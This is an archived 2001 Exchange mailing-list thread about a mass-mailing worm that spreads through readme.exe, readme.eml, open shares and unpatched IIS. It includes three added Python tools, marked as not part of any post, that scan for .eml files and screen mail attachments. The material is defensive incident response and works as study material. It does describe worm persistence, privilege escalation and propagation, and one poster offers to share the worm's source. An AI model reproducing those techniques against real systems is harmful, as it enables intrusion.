Sent: Tuesday, September 18, 2001 3:42 PM
To: Exchange Discussions
Subject: RE: New Virus / Worm ??


They are mentioned in the NAI website. I've also seen mention of WAV and COM
files.

-Peter


-Original Message-
From: [EMAIL PROTECTED] [mailto:[EMAIL PROTECTED]]
Sent: Tuesday, September 18, 2001 12:37
To: Exchange Discussions
Subject: RE: New Virus / Worm ??


has anybody seen anything Official about the .eml files?  I've just heard
anecdotal evidence about them.  

-Michèle
Immigration site:  http://LadySun1969.tripod.com
Our new 2001 Miata:  http://members.cardomain.com/bpituley
Tiggercam:  http://www.tiggercam.co.uk
-
Why do they put pictures of criminals up in the Post Office?  What are we
supposed to do . . . write to these men? Why don't they just put their
pictures on the postage stamps so the mailmen could look for them while they
delivered the mail? 
-


-Original Message-
From: Daniel Deward [mailto:[EMAIL PROTECTED]]
Sent: Tuesday, September 18, 2001 3:37 PM
To: Exchange Discussions
Subject: RE: New Virus / Worm ??


If you block EXE's there is no need to wait for updates.  For more
information, visit http://www.cmsconnect.com

Dan


-Original Message-
From: Pfefferkorn, Pete (PFEFFEPE) [mailto:[EMAIL PROTECTED]] 
Sent: Tuesday, September 18, 2001 3:16 PM
To: Exchange Discussions
Subject: RE: New Virus / Worm ??

Yes, NAI released an extra.dat  Still waiting for trend to put out an
update.  

Pete Pfefferkorn
Senior Systems Engineer/Mail Administrator
University of Cincinnati
51 Goodman Street
Cincinnati, OH  45221
Phone - (513) 556-9076
Fax - (513) 556-2042


-Original Message-
From: Etts, Russell [mailto:[EMAIL PROTECTED]]
Sent: Tuesday, September 18, 2001 2:51 PM
To: Exchange Discussions
Subject: RE: New Virus / Worm ??


Does anyone have any more info on this??

Does NAI have an update?  I can't get through to them.

Thanks

Russell

-Original Message-
From: John Bricher [mailto:[EMAIL PROTECTED]]
Sent: Tuesday, September 18, 2001 12:33 PM
To: Exchange Discussions
Subject: RE: New Virus / Worm ??


On the servers that were infected at our company, we found a mmc.exe that
was running in c:\winnt.  This appeared to be regenerating the readme.eml
files.  We killed the process, deleted the file, and deleted the .eml files.
This appears to have worked for now.

Not sure how to stop it from happening again.


John Bricher
Windows NT Engineer
Cybear, Inc.
561-999-3549
[EMAIL PROTECTED]




RE: New Virus / Worm ??

2001-09-18 Thread msharik

I've got a file server with a bunch of .eml files - desktop.eml fax1.eml
2.eml professional.eml etc. - all created at the same time in various
subdirectories of a public share & all the same size & all owned by the same
person.

That sounds suspiciously like this, but I can't find anything definitive
about these damn .eml files!! 

-Michèle
Immigration site:  http://LadySun1969.tripod.com
Our new 2001 Miata:  http://members.cardomain.com/bpituley
Tiggercam:  http://www.tiggercam.co.uk
-
The fact that no one understands you doesn't mean you're an artist. 
-


-Original Message-
From: John Allhiser [mailto:[EMAIL PROTECTED]]
Sent: Tuesday, September 18, 2001 3:39 PM
To: Exchange Discussions
Subject: RE: New Virus / Worm ??


I believe readme.eml is loaded to an infected IIS website as an attachment
to
every page in the site.
When the infected site is accessed, it is downloaded as an .exe  
 
This is what I see on securityfocus.com and the noted anti-virus sites.

John Allhiser MCSE CCNA
Network Engineer
Business Men's Assurance

-Original Message-
From: [EMAIL PROTECTED] [mailto:[EMAIL PROTECTED]]
Sent: Tuesday, September 18, 2001 2:37 PM
To: Exchange Discussions
Subject: RE: New Virus / Worm ??


has anybody seen anything Official about the .eml files?  I've just heard
anecdotal evidence about them.  

-Michèle
Immigration site:  http://LadySun1969.tripod.com
Our new 2001 Miata:  http://members.cardomain.com/bpituley
Tiggercam:  http://www.tiggercam.co.uk
-
Why do they put pictures of criminals up in the Post Office?  What are we
supposed to do . . . write to these men? Why don't they just put their
pictures on the postage stamps so the mailmen could look for them while they
delivered the mail? 
-


-Original Message-
From: Daniel Deward [mailto:[EMAIL PROTECTED]]
Sent: Tuesday, September 18, 2001 3:37 PM
To: Exchange Discussions
Subject: RE: New Virus / Worm ??


If you block EXE's there is no need to wait for updates.  For more
information, visit http://www.cmsconnect.com

Dan


-Original Message-
From: Pfefferkorn, Pete (PFEFFEPE) [mailto:[EMAIL PROTECTED]] 
Sent: Tuesday, September 18, 2001 3:16 PM
To: Exchange Discussions
Subject: RE: New Virus / Worm ??

Yes, NAI released an extra.dat  Still waiting for trend to put out an
update.  

Pete Pfefferkorn
Senior Systems Engineer/Mail Administrator
University of Cincinnati
51 Goodman Street
Cincinnati, OH  45221
Phone - (513) 556-9076
Fax - (513) 556-2042


-Original Message-
From: Etts, Russell [mailto:[EMAIL PROTECTED]]
Sent: Tuesday, September 18, 2001 2:51 PM
To: Exchange Discussions
Subject: RE: New Virus / Worm ??


Does anyone have any more info on this??

Does NAI have an update?  I can't get through to them.

Thanks

Russell

-Original Message-
From: John Bricher [mailto:[EMAIL PROTECTED]]
Sent: Tuesday, September 18, 2001 12:33 PM
To: Exchange Discussions
Subject: RE: New Virus / Worm ??


On the servers that were infected at our company, we found a mmc.exe that
was running in c:\winnt.  This appeared to be regenerating the readme.eml
files.  We killed the process, deleted the file, and deleted the .eml files.
This appears to have worked for now.

Not sure how to stop it from happening again.


John Bricher
Windows NT Engineer
Cybear, Inc.
561-999-3549
[EMAIL PROTECTED]
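
Added example, not part of any poster's message: the pattern Michèle describes above (many .eml files of identical size, written at the same time across subdirectories of a share) as a sweep a file-server admin could run. It compares size and modification time only, since os.stat does not expose the file owner portably; the thresholds, function names and demo tree are assumptions, and the demo files are constructed.

```python
import os
import tempfile
from collections import defaultdict


def find_eml_clusters(root, window_seconds=300, min_files=3, min_dirs=2):
    """Return groups of same-sized .eml files whose modification times fall
    within window_seconds of each other and that span at least min_dirs
    directories under root."""
    by_size = defaultdict(list)
    for dirpath, _dirnames, filenames in os.walk(root):
        for name in filenames:
            if not name.lower().endswith(".eml"):
                continue
            path = os.path.join(dirpath, name)
            try:
                st = os.stat(path)
            except OSError:
                continue  # file vanished or is unreadable; skip it
            by_size[st.st_size].append((st.st_mtime, path))

    clusters = []
    for size, entries in sorted(by_size.items()):
        entries.sort()
        run = []
        for entry in entries + [None]:  # the trailing None flushes the last run
            if entry is None or (run and entry[0] - run[0][0] > window_seconds):
                dirs = {os.path.dirname(p) for _t, p in run}
                if len(run) >= min_files and len(dirs) >= min_dirs:
                    clusters.append({"size": size,
                                     "first_mtime": run[0][0],
                                     "paths": [p for _t, p in run]})
                run = []
            if entry is not None:
                run.append(entry)
    return clusters


def build_demo_tree(root, stamp=1000000000):
    """Create a constructed share layout: four identical .eml files written at
    the same moment, plus two benign files that must not be grouped with them."""
    payload = b"constructed placeholder, not a real message\n"

    def write(parts, data, mtime):
        path = os.path.join(root, *parts)
        os.makedirs(os.path.dirname(path), exist_ok=True)
        with open(path, "wb") as fh:
            fh.write(data)
        os.utime(path, (mtime, mtime))

    # File names taken from the post; directory names are made up.
    write(("sales", "desktop.eml"), payload, stamp)
    write(("sales", "fax", "fax1.eml"), payload, stamp)
    write(("hr", "2.eml"), payload, stamp)
    write(("hr", "professional.eml"), payload, stamp)
    write(("hr", "old.eml"), payload, stamp - 86400)          # same size, a day earlier
    write(("sales", "newsletter.eml"), payload + b"x", stamp)  # same time, other size


if __name__ == "__main__":
    with tempfile.TemporaryDirectory() as demo_root:
        build_demo_tree(demo_root)
        for cluster in find_eml_clusters(demo_root):
            print(cluster["size"], "bytes:", len(cluster["paths"]), "files")
            for path in cluster["paths"]:
                print("   ", os.path.relpath(path, demo_root))
```

A cluster is a lead for triage, not proof of infection: confirm against the vendor write-up before deleting anything.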




RE: New Virus / Worm ??

2001-09-18 Thread John Bricher

It appears the virus is putting the guest account into the local admin group
on the infected server.

I am blocking all .exe's
I used exmerge to recover all readme.exe's that had already made it past the
block.
I have installed the new dat from McAfee on all IIS servers.
It cleans all the files, but the virus is back within an hour.
What a waste of a day!

-Original Message-
From: [EMAIL PROTECTED] [mailto:[EMAIL PROTECTED]]
Sent: Tuesday, September 18, 2001 3:47 PM
To: Exchange Discussions
Subject: RE: New Virus / Worm ??


you got a link for where they're mentioned?  I looked at nai.com and at
sybari.com & sophos.com and can't find anything about them.

maybe i'm just blind.


-Michèle
Immigration site:  http://LadySun1969.tripod.com
Our new 2001 Miata:  http://members.cardomain.com/bpituley
Tiggercam:  http://www.tiggercam.co.uk
-
Pinky, are you pondering what I'm pondering? Well, I think so Brain, but
what if we stick to the seat covers? 
-


-Original Message-
From: Durkee, Peter [mailto:[EMAIL PROTECTED]]
Sent: Tuesday, September 18, 2001 3:42 PM
To: Exchange Discussions
Subject: RE: New Virus / Worm ??


They are mentioned in the NAI website. I've also seen mention of WAV and COM
files.

-Peter


-Original Message-
From: [EMAIL PROTECTED] [mailto:[EMAIL PROTECTED]]
Sent: Tuesday, September 18, 2001 12:37
To: Exchange Discussions
Subject: RE: New Virus / Worm ??


has anybody seen anything Official about the .eml files?  I've just heard
anecdotal evidence about them.  

-Michèle
Immigration site:  http://LadySun1969.tripod.com
Our new 2001 Miata:  http://members.cardomain.com/bpituley
Tiggercam:  http://www.tiggercam.co.uk
-
Why do they put pictures of criminals up in the Post Office?  What are we
supposed to do . . . write to these men? Why don't they just put their
pictures on the postage stamps so the mailmen could look for them while they
delivered the mail? 
-


-Original Message-
From: Daniel Deward [mailto:[EMAIL PROTECTED]]
Sent: Tuesday, September 18, 2001 3:37 PM
To: Exchange Discussions
Subject: RE: New Virus / Worm ??


If you block EXE's there is no need to wait for updates.  For more
information, visit http://www.cmsconnect.com

Dan


-Original Message-
From: Pfefferkorn, Pete (PFEFFEPE) [mailto:[EMAIL PROTECTED]] 
Sent: Tuesday, September 18, 2001 3:16 PM
To: Exchange Discussions
Subject: RE: New Virus / Worm ??

Yes, NAI released an extra.dat  Still waiting for trend to put out an
update.  

Pete Pfefferkorn
Senior Systems Engineer/Mail Administrator
University of Cincinnati
51 Goodman Street
Cincinnati, OH  45221
Phone - (513) 556-9076
Fax - (513) 556-2042


-Original Message-
From: Etts, Russell [mailto:[EMAIL PROTECTED]]
Sent: Tuesday, September 18, 2001 2:51 PM
To: Exchange Discussions
Subject: RE: New Virus / Worm ??


Does anyone have any more info on this??

Does NAI have an update?  I can't get through to them.

Thanks

Russell

-Original Message-
From: John Bricher [mailto:[EMAIL PROTECTED]]
Sent: Tuesday, September 18, 2001 12:33 PM
To: Exchange Discussions
Subject: RE: New Virus / Worm ??


On the servers that were infected at our company, we found a mmc.exe that
was running in c:\winnt.  This appeared to be regenerating the readme.eml
files.  We killed the process, deleted the file, and deleted the .eml files.
This appears to have worked for now.

Not sure how to stop it from happening again.


John Bricher
Windows NT Engineer
Cybear, Inc.
561-999-3549
[EMAIL PROTECTED]




RE: New Virus / Worm ??

2001-09-18 Thread Waters, Jeff

I started blocking them about a month ago.  We had a user receive one, then
when it was opened up it had an .exe in it as an attachment.   I decided to
block them as I did not want this used as a conduit to bypass our .exe
blocking.  The good news is that it has worked, I have blocked about 6 or 7
of them today, however I have not seen any instance of readme.exe trying to
get through.
Oh the fun!
Jeff

Jeffrey R. Waters
Senior Systems Engineer
Information Technology, Hanover County


-Original Message-
From: [EMAIL PROTECTED] [mailto:[EMAIL PROTECTED]]
Sent: Tuesday, September 18, 2001 3:37 PM
To: Exchange Discussions
Subject: RE: New Virus / Worm ??


has anybody seen anything Official about the .eml files?  I've just heard
anecdotal evidence about them.  

-Michèle
Immigration site:  http://LadySun1969.tripod.com
Our new 2001 Miata:  http://members.cardomain.com/bpituley
Tiggercam:  http://www.tiggercam.co.uk
-
Why do they put pictures of criminals up in the Post Office?  What are we
supposed to do . . . write to these men? Why don't they just put their
pictures on the postage stamps so the mailmen could look for them while they
delivered the mail? 
-


-Original Message-
From: Daniel Deward [mailto:[EMAIL PROTECTED]]
Sent: Tuesday, September 18, 2001 3:37 PM
To: Exchange Discussions
Subject: RE: New Virus / Worm ??


If you block EXE's there is no need to wait for updates.  For more
information, visit http://www.cmsconnect.com

Dan


-Original Message-
From: Pfefferkorn, Pete (PFEFFEPE) [mailto:[EMAIL PROTECTED]] 
Sent: Tuesday, September 18, 2001 3:16 PM
To: Exchange Discussions
Subject: RE: New Virus / Worm ??

Yes, NAI released an extra.dat  Still waiting for trend to put out an
update.  

Pete Pfefferkorn
Senior Systems Engineer/Mail Administrator
University of Cincinnati
51 Goodman Street
Cincinnati, OH  45221
Phone - (513) 556-9076
Fax - (513) 556-2042


-Original Message-
From: Etts, Russell [mailto:[EMAIL PROTECTED]]
Sent: Tuesday, September 18, 2001 2:51 PM
To: Exchange Discussions
Subject: RE: New Virus / Worm ??


Does anyone have any more info on this??

Does NAI have an update?  I can't get through to them.

Thanks

Russell

-Original Message-
From: John Bricher [mailto:[EMAIL PROTECTED]]
Sent: Tuesday, September 18, 2001 12:33 PM
To: Exchange Discussions
Subject: RE: New Virus / Worm ??


On the servers that were infected at our company, we found a mmc.exe that
was running in c:\winnt.  This appeared to be regenerating the readme.eml
files.  We killed the process, deleted the file, and deleted the .eml files.
This appears to have worked for now.

Not sure how to stop it from happening again.


John Bricher
Windows NT Engineer
Cybear, Inc.
561-999-3549
[EMAIL PROTECTED]
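
Added example, not part of any poster's message or any vendor's product: Jeff Waters's reason above for blocking .eml attachments, that a wrapped message can carry an .exe past an extension block, shown as a recursive attachment check. The blocked-extension set, the depth limit and the function names are assumptions, and the sample messages are constructed.

```python
import email
from email import policy
from email.message import EmailMessage

# Assumption: a site policy. The thread talks about blocking .exe and mentions .com.
BLOCKED_EXTENSIONS = {".exe", ".com"}
MAX_DEPTH = 5  # messages nested deeper than this are reported, not unpacked


def extension_of(filename):
    """Lower-cased last extension. Trailing dots and spaces are dropped first,
    because Windows ignores them when the file is saved and opened."""
    name = (filename or "").strip().rstrip(". ").lower()
    dot = name.rfind(".")
    return name[dot:] if dot != -1 else ""


def top_level_blocked(raw):
    """What a filter sees if it only checks the outer message's attachments."""
    msg = email.message_from_bytes(raw, policy=policy.default)
    return [p.get_filename() for p in msg.iter_attachments()
            if extension_of(p.get_filename()) in BLOCKED_EXTENSIONS]


def _scan(part, depth, trail, findings):
    name = part.get_filename()
    here = trail + [name] if name else trail
    ext = extension_of(name)
    if ext in BLOCKED_EXTENSIONS:
        findings.append("/".join(here))
        return
    if part.is_multipart():
        # multipart/* container, or a message/rfc822 part the parser already opened
        wrapped = part.get_content_type() == "message/rfc822"
        children, next_depth = part.get_payload(), depth + (1 if wrapped else 0)
    elif ext == ".eml":
        # .eml sent as an opaque (e.g. base64) attachment: decode and parse it
        raw = part.get_payload(decode=True) or b""
        children = [email.message_from_bytes(raw, policy=policy.default)]
        next_depth = depth + 1
    else:
        return
    if next_depth > MAX_DEPTH:
        findings.append(("/".join(here) or "(unnamed)") + " [nested too deep]")
        return
    for child in children:
        _scan(child, next_depth, here, findings)


def find_blocked_attachments(raw):
    """Return 'outer.eml/inner.exe' style paths for every blocked attachment,
    including ones wrapped inside attached messages."""
    findings = []
    _scan(email.message_from_bytes(raw, policy=policy.default), 0, [], findings)
    return findings


def build_sample(as_rfc822):
    """Constructed test message: readme.exe wrapped inside readme.eml."""
    inner = EmailMessage()
    inner["Subject"] = "constructed inner message"
    inner.set_content("inner body")
    inner.add_attachment(b"constructed bytes, not a real program",
                         maintype="application", subtype="octet-stream",
                         filename="readme.exe")
    outer = EmailMessage()
    outer["Subject"] = "constructed outer message"
    outer.set_content("outer body")
    if as_rfc822:
        # attached the way a mail client forwards a message as an attachment
        outer.add_attachment(inner, filename="readme.eml")
    else:
        # attached as an opaque file that happens to be named .eml
        outer.add_attachment(inner.as_bytes(), maintype="application",
                             subtype="octet-stream", filename="readme.eml")
    return outer.as_bytes()


if __name__ == "__main__":
    for as_rfc822 in (True, False):
        sample = build_sample(as_rfc822)
        print("top level:", top_level_blocked(sample),
              "recursive:", find_blocked_attachments(sample))
```

Both samples pass the top-level check and are caught only by the recursive one, which is the gap that blocking .eml outright closes without any unpacking.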






RE: New Virus / Worm ??

2001-09-18 Thread Matt Hoffman

Look here under Removal Instructions:

http://vil.nai.com/vil/virusSummary.asp?virus_k=99209

Matt Hoffman


-Original Message-
From: [EMAIL PROTECTED] [mailto:[EMAIL PROTECTED]]
Sent: Tuesday, September 18, 2001 3:47 PM
To: Exchange Discussions
Subject: RE: New Virus / Worm ??


you got a link for where they're mentioned?  I looked at nai.com and at
sybari.com & sophos.com and can't find anything about them.

maybe i'm just blind.


-Michèle
Immigration site:  http://LadySun1969.tripod.com
Our new 2001 Miata:  http://members.cardomain.com/bpituley
Tiggercam:  http://www.tiggercam.co.uk
-
Pinky, are you pondering what I'm pondering? Well, I think so Brain, but
what if we stick to the seat covers? 
-


-Original Message-
From: Durkee, Peter [mailto:[EMAIL PROTECTED]]
Sent: Tuesday, September 18, 2001 3:42 PM
To: Exchange Discussions
Subject: RE: New Virus / Worm ??


They are mentioned in the NAI website. I've also seen mention of WAV and COM
files.

-Peter


-Original Message-
From: [EMAIL PROTECTED] [mailto:[EMAIL PROTECTED]]
Sent: Tuesday, September 18, 2001 12:37
To: Exchange Discussions
Subject: RE: New Virus / Worm ??


has anybody seen anything Official about the .eml files?  I've just heard
anecdotal evidence about them.  

-Michèle
Immigration site:  http://LadySun1969.tripod.com
Our new 2001 Miata:  http://members.cardomain.com/bpituley
Tiggercam:  http://www.tiggercam.co.uk
-
Why do they put pictures of criminals up in the Post Office?  What are we
supposed to do . . . write to these men? Why don't they just put their
pictures on the postage stamps so the mailmen could look for them while they
delivered the mail? 
-


-Original Message-
From: Daniel Deward [mailto:[EMAIL PROTECTED]]
Sent: Tuesday, September 18, 2001 3:37 PM
To: Exchange Discussions
Subject: RE: New Virus / Worm ??


If you block EXE's there is no need to wait for updates.  For more
information, visit http://www.cmsconnect.com

Dan


-Original Message-
From: Pfefferkorn, Pete (PFEFFEPE) [mailto:[EMAIL PROTECTED]] 
Sent: Tuesday, September 18, 2001 3:16 PM
To: Exchange Discussions
Subject: RE: New Virus / Worm ??

Yes, NAI released an extra.dat  Still waiting for trend to put out an
update.  

Pete Pfefferkorn
Senior Systems Engineer/Mail Administrator
University of Cincinnati
51 Goodman Street
Cincinnati, OH  45221
Phone - (513) 556-9076
Fax - (513) 556-2042


-Original Message-
From: Etts, Russell [mailto:[EMAIL PROTECTED]]
Sent: Tuesday, September 18, 2001 2:51 PM
To: Exchange Discussions
Subject: RE: New Virus / Worm ??


Does anyone have any more info on this??

Does NAI have an update?  I can't get through to them.

Thanks

Russell

-Original Message-
From: John Bricher [mailto:[EMAIL PROTECTED]]
Sent: Tuesday, September 18, 2001 12:33 PM
To: Exchange Discussions
Subject: RE: New Virus / Worm ??


On the servers that were infected at our company, we found a mmc.exe that
was running in c:\winnt.  This appeared to be regenerating the readme.eml
files.  We killed the process, deleted the file, and deleted the .eml files.
This appears to have worked for now.

Not sure how to stop it from happening again.


John Bricher
Windows NT Engineer
Cybear, Inc.
561-999-3549
[EMAIL PROTECTED]




RE: New Virus / Worm ??

2001-09-18 Thread Tom Meunier

I wish I didn't know the answer to this one:  C:\shared\


 -Original Message-
 From: Erik Sojka [mailto:[EMAIL PROTECTED]]
 Posted At: Tuesday, September 18, 2001 03:02 PM
 Posted To: MSExchange Mailing List
 Conversation: New Virus / Worm ??
 Subject: RE: New Virus / Worm ??
 
 
 What share does it create on an infected machine?
 
 



RE: New Virus / Worm ??

2001-09-18 Thread Andrew Pike

May I have a copy please!!

-Original Message-
From: Daniel Deward [mailto:[EMAIL PROTECTED]]
Sent: 18 September 2001 21:08
To: Exchange Discussions
Subject: RE: New Virus / Worm ??


If you want the source code for readme.exe, readme.asm.  Send me an e-mail
for a copy.  It's very interesting!

Dan
http://www.cmsconnect.com


-Original Message-
From: Erik Sojka [mailto:[EMAIL PROTECTED]] 
Sent: Tuesday, September 18, 2001 4:02 PM
To: Exchange Discussions
Subject: RE: New Virus / Worm ??

What share does it create on an infected machine?




This email has been scanned for all viruses by the Star Internet Virus
Screen.
The service is provided in partnership with MessageLabs, the email security
company.
For more information on a higher level of virus protection visit
www.star.net.uk






RE: New Virus / Worm ??

2001-09-18 Thread Andrew Pike

sorry!!

-Original Message-
From: Andrew Pike [mailto:[EMAIL PROTECTED]]
Sent: 18 September 2001 21:16
To: Exchange Discussions
Subject: RE: New Virus / Worm ??


May I have a copy please!!

-Original Message-
From: Daniel Deward [mailto:[EMAIL PROTECTED]]
Sent: 18 September 2001 21:08
To: Exchange Discussions
Subject: RE: New Virus / Worm ??


If you want the source code for readme.exe, readme.asm.  Send me an e-mail
for a copy.  It's very interesting!

Dan
http://www.cmsconnect.com


-Original Message-
From: Erik Sojka [mailto:[EMAIL PROTECTED]] 
Sent: Tuesday, September 18, 2001 4:02 PM
To: Exchange Discussions
Subject: RE: New Virus / Worm ??

What share does it create on an infected machine?





RE: New Virus / Worm ??

2001-09-18 Thread Wright, Steven

I just received an e-mail with this virus/worm.  It appears to be not very
nice.  I use the preview pane in Outlook and it automatically attempted to
launch the attachment.  For once, I'm glad I had the new security features
in Outlook SR-1 that does not allow launching an .exe w/out saving it to the
hard drive first.

The virus had a subject with 255 characters in it.  Methinks there was/is an
exploit for subject lines that long.

Subject:
dbaseconfigatssubsatssubdbase415cachedbdupsmillarddupsdbinfodatacollectcrapo
mahaconfig280713busesdupsdbase15adduser4dbase15omaha2baseyearplainviewdbinfo
dbsetupnasdatacrapplainviewomaha3genericadduser4westsidedbsetupdblinkexpdbci
nitdbasedbaseivmillardomaha

From what Symantec and McAfee say, this isn't the worst virus ever, but it's
not very nice, either.  Worst part, I guess is that it propagates by
e-mailing itself out to everybody.  It then scans for IIS servers that are
not patched for the CodeBlue/Unicode exploit.

http://vil.mcafee.com/dispVirus.asp?virus_k=99209;
AVERT is currently analyzing this threat and will post more details shortly.

This is a mass-mailing worm, which also spreads via open shares, and a
Microsoft Web Folder Transversal vulnerability. 
The email attachment name seems to be limited to Readme.exe and uses the
icon for an Internet Explorer HTML document.
The virus contains the string : Concept Virus (CV) V.5, Copyright (C) 2001
R.P.China

http:[EMAIL PROTECTED]

Until they come up with a patch, block all file attachments named
readme.exe.

I'm sure we'll be seeing a lot more of this in the coming days.

Steve


-Original Message-
From: Etts, Russell [mailto:[EMAIL PROTECTED]]
Sent: Tuesday, September 18, 2001 2:51 PM
To: Exchange Discussions
Subject: RE: New Virus / Worm ??


Does anyone have any more info on this??

Does NAI have an update?  I can't get through to them.

Thanks

Russell

-Original Message-
From: John Bricher [mailto:[EMAIL PROTECTED]]
Sent: Tuesday, September 18, 2001 12:33 PM
To: Exchange Discussions
Subject: RE: New Virus / Worm ??


On the servers that were infected at our company, we found a mmc.exe that
was running in c:\winnt.  This appeared to be regenerating the readme.eml
files.  We killed the process, deleted the file, and deleted the .eml files.
This appears to have worked for now.

Not sure how to stop it from happening again.


John Bricher
Windows NT Engineer
Cybear, Inc.
561-999-3549
[EMAIL PROTECTED]






RE: New Virus / Worm ??

2001-09-18 Thread sue

It exploits the very dangerous iFrame vulnerability detailed at
http://www.microsoft.com/technet/security/bulletin/ms01-020.asp. The one
thing that article doesn't tell you is that the IE patch it describes does
not block the ability of Office documents in an iFrame to launch
automatically. What that means is that if you don't have Office macro
security set high enough, the next attack could use a Word .doc macro to
deliver its payload.

 I just received an e-mail with this virus/worm.  It appears to be not very
 nice.  I use the preview pane in Outlook and it automatically attempted to
 launch the attachment.  For once, I'm glad I had the new security features
 in Outlook SR-1 that does not allow launching an .exe w/out saving it to the
 hard drive first.
 
 The virus had a subject with 255 characters in it.  Methinks there was/is an
 exploit for subject lines that long.
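
Added example (not part of the original thread, and not any vendor's code): a gateway-side check in Python for the two points made above, blocking attachments named readme.exe and catching an attachment whose declared MIME type does not match an executable file name, the kind of incorrect MIME header that the MS01-020 bulletin linked above describes. The extension list, the function names and the sample messages are assumptions constructed for the illustration.

```python
"""Attachment screening for inbound mail (added example, constructed data)."""
import ntpath
import os
from email import message_from_bytes, policy
from email.message import EmailMessage

# File name the thread says to block outright.
BLOCKED_NAMES = {"readme.exe"}
# Assumption for this example: extensions treated as directly executable.
EXECUTABLE_EXTS = {".exe", ".com", ".scr", ".pif", ".bat", ".cmd", ".vbs"}


def normalise_name(raw_name):
    """Lower-case the base name and drop trailing dots and spaces, which
    Windows ignores, so 'README.EXE.' is compared as 'readme.exe'."""
    return ntpath.basename(raw_name or "").strip().rstrip(". ").lower()


def check_part(part):
    """Return the list of reasons one leaf MIME part should be blocked."""
    name = normalise_name(part.get_filename())
    ext = os.path.splitext(name)[1]
    data = part.get_payload(decode=True) or b""
    reasons = []
    if name in BLOCKED_NAMES:
        reasons.append("blocked-name")
    if ext in EXECUTABLE_EXTS:
        reasons.append("executable-extension")
        # An executable name under a media or text type means the headers
        # misdescribe the content.
        if part.get_content_maintype() != "application":
            reasons.append("type-mismatch")
    # Coarse content check: DOS/PE executables start with the bytes 'MZ',
    # whatever the part is called.
    if data[:2] == b"MZ":
        reasons.append("mz-magic")
    return reasons


def inspect_message(raw_bytes):
    """Parse a raw RFC 822 message and list (filename, reasons) per bad part."""
    msg = message_from_bytes(raw_bytes, policy=policy.default)
    findings = []
    for part in msg.walk():
        if part.is_multipart():
            continue  # containers carry no payload of their own
        reasons = check_part(part)
        if reasons:
            findings.append((part.get_filename() or "(unnamed)", reasons))
    return findings


def verdict(raw_bytes):
    """Gateway decision for one message."""
    return "block" if inspect_message(raw_bytes) else "deliver"


def build_sample(filename, maintype, subtype, payload):
    """Build a constructed test message with one attachment (not real mail)."""
    msg = EmailMessage()
    msg["From"] = "sender@example.test"
    msg["To"] = "rcpt@example.test"
    msg["Subject"] = "constructed sample"
    msg.set_content("constructed body")
    msg.add_attachment(payload, maintype=maintype, subtype=subtype,
                       filename=filename)
    return msg.as_bytes()


if __name__ == "__main__":
    # Constructed samples: payloads are placeholder bytes, not programs.
    samples = {
        "mislabelled readme.exe": build_sample(
            "readme.exe", "audio", "x-wav", b"MZ" + b"\x00" * 16),
        "renamed executable": build_sample(
            "photo.jpg", "image", "jpeg", b"MZ\x90\x00"),
        "ordinary document": build_sample(
            "report.pdf", "application", "pdf", b"%PDF-1.4 constructed"),
    }
    for label, raw in samples.items():
        print(label, "->", verdict(raw), inspect_message(raw))
```

The name check alone stops only this one attachment name; the extension, type-mismatch and content checks are what still apply once the file is renamed.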




RE: New Virus / Worm ??

2001-09-18 Thread Heather Bellson

the sdat version 2 deleted a bunch of executables on the three nt boxes we
ran virus scan on.  we had it set to automatically clean.  iexplore.exe
hyperterminal, etc.  not good.

anyone else seeing this?


-Original Message-
From: Pfefferkorn, Pete (PFEFFEPE) [mailto:[EMAIL PROTECTED]]
Sent: Tuesday, September 18, 2001 12:16 PM
To: Exchange Discussions
Subject: RE: New Virus / Worm ??


Yes, NAI released an extra.dat  Still waiting for trend to put out an
update.  

Pete Pfefferkorn
Senior Systems Engineer/Mail Administrator
University of Cincinnati
51 Goodman Street
Cincinnati, OH  45221
Phone - (513) 556-9076
Fax - (513) 556-2042


-Original Message-
From: Etts, Russell [mailto:[EMAIL PROTECTED]]
Sent: Tuesday, September 18, 2001 2:51 PM
To: Exchange Discussions
Subject: RE: New Virus / Worm ??


Does anyone have any more info on this??

Does NAI have an update?  I can't get through to them.

Thanks

Russell

-Original Message-
From: John Bricher [mailto:[EMAIL PROTECTED]]
Sent: Tuesday, September 18, 2001 12:33 PM
To: Exchange Discussions
Subject: RE: New Virus / Worm ??


On the servers that were infected at our company, we found a mmc.exe that
was running in c:\winnt.  This appeared to be regenerating the readme.eml
files.  We killed the process, deleted the file, and deleted the .eml files.
This appears to have worked for now.

Not sure how to stop it from happening again.


John Bricher
Windows NT Engineer
Cybear, Inc.
561-999-3549
[EMAIL PROTECTED]






RE: New Virus / Worm ??

2001-09-18 Thread Heather Bellson

woops, i should say that i'm talking about NAI's sdat.

-Original Message-
From: Heather Bellson [mailto:[EMAIL PROTECTED]]
Sent: Tuesday, September 18, 2001 2:16 PM
To: Exchange Discussions
Subject: RE: New Virus / Worm ??


the sdat version 2 deleted a bunch of executables on the three nt boxes we
ran virus scan on.  we had it set to automatically clean.  iexplore.exe
hyperterminal, etc.  not good.

anyone else seeing this?


-Original Message-
From: Pfefferkorn, Pete (PFEFFEPE) [mailto:[EMAIL PROTECTED]]
Sent: Tuesday, September 18, 2001 12:16 PM
To: Exchange Discussions
Subject: RE: New Virus / Worm ??


Yes, NAI released an extra.dat  Still waiting for trend to put out an
update.  

Pete Pfefferkorn
Senior Systems Engineer/Mail Administrator
University of Cincinnati
51 Goodman Street
Cincinnati, OH  45221
Phone - (513) 556-9076
Fax - (513) 556-2042


-Original Message-
From: Etts, Russell [mailto:[EMAIL PROTECTED]]
Sent: Tuesday, September 18, 2001 2:51 PM
To: Exchange Discussions
Subject: RE: New Virus / Worm ??


Does anyone have any more info on this??

Does NAI have an update?  I can't get through to them.

Thanks

Russell

-Original Message-
From: John Bricher [mailto:[EMAIL PROTECTED]]
Sent: Tuesday, September 18, 2001 12:33 PM
To: Exchange Discussions
Subject: RE: New Virus / Worm ??


On the servers that were infected at our company, we found a mmc.exe that
was running in c:\winnt.  This appeared to be regenerating the readme.eml
files.  We killed the process, deleted the file, and deleted the .eml files.
This appears to have worked for now.

Not sure how to stop it from happening again.


John Bricher
Windows NT Engineer
Cybear, Inc.
561-999-3549
[EMAIL PROTECTED]






RE: New Virus / Worm ??

2001-09-18 Thread Craig Manske

Trend finally came out with their pattern update. :(  Luckily I didn't get it
anywhere.

 -Original Message-
 From: Heather Bellson [mailto:[EMAIL PROTECTED]]
 Sent: Tuesday, September 18, 2001 4:23 PM
 To: Exchange Discussions
 Subject: RE: New Virus / Worm ??
 
 
 woops, i should say that i'm talking about NAI's sdat.
 
 -Original Message-
 From: Heather Bellson [mailto:[EMAIL PROTECTED]]
 Sent: Tuesday, September 18, 2001 2:16 PM
 To: Exchange Discussions
 Subject: RE: New Virus / Worm ??
 
 
